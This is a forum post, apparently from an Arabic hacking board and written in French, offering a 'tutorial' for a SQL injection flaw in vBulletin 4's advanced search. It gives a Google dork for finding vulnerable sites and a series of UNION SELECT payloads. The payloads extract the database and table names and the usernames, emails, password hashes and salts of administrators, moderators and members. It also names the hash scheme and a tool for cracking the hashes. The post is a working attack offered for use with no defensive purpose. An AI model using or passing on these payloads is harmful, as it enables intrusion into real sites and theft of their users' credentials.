عرض مشاركة واحدة
قديم 05/02/2012, 01:44   المشاركة رقم: 1
المعلومات
الكاتب:
 The UnKn0wN  
اللقب:
عضــــو جديــــد
الصورة الرمزية
 
الصورة الرمزية The UnKn0wN

البيانات
التسجيل : Feb 2012
العضوية : 3484
الاهتمامات :
الإقامة :
المواضيع : 1
الردود : 0
المجموع : 1
بمعدل : 0.00 يوميا
الاختراقات : [The UnKn0wN]
مجتمعنا : [The UnKn0wN]
الصنف : Gray Hat Hacker
آخر تواجد : 18/08/2012/20:19
سبب الغياب : حاظر
معدل التقييم: 0
نقاط التقييم: 10
The UnKn0wN is on a distinguished road
شكراً: 0
تم شكره مرة واحدة في مشاركة واحدة

 Algeria


الإتصالات
الحالة:
The UnKn0wN غير متواجد حالياً
وسائل الإتصال:

افتراضي vBulletin 4 SQL Injection Tutorial

Salutations,




je vous poste aujourd'hui la nouvelle faille découverte sur le puissant vBulletin.

La vulnérabilité touche les versions 4 de vBulletin . dans le module de la recherche avancée
l'exploitation de la faille ce fait grâce au cébèble plugin firefox (Live HTTP Headers)
Google dork : inurl:”search.php?search_type=1?
La faille nous permet d'avoir le username et le hash du mot de passe qu'on peux décrypter grâce au logiciel PasswordPro (Téléchargement IcI) en utilisant l’algorithme
md5(md5($pass).$salt).




Requêtes utilisés pour l'extraction des idents :

كود:
Affiche le nom de la BDD :
&cat[0]=1) UNION SELECT database()#


Affiche la liste des tables :
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#


Affiche les informations du l'Administrateur suprême (User, passe hash, email, salt) :
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#<


Affiche tout les admin :
&cat[0]=1) union+select+group_concat(username,0x3a,password,0x3a,salt) from user where usergroupid=6#


Affiche tout les super modo :
&cat[0]=1) union+select+group_concat(username,0x3a,password,0x3a,salt) from user where usergroupid=5#


Affiche tout les modos :
&cat[0]=1) union+select+group_concat(username,0x3a,password,0x3a,salt) from user where usergroupid=7#


Affiche les membres normaux :
&cat[0]=1) union+select+group_concat(username,0x3a,password,0x3a,salt) from user where usergroupid=2#
Enjoy



آخر مواضيع » The UnKn0wN


التعديل الأخير تم بواسطة ViRuS_Ra3cH ; 05/02/2012 الساعة 02:19
عرض البوم صور The UnKn0wN   رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ The UnKn0wN على المشاركة المفيدة:
ViRuS_Ra3cH (05/02/2012)
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115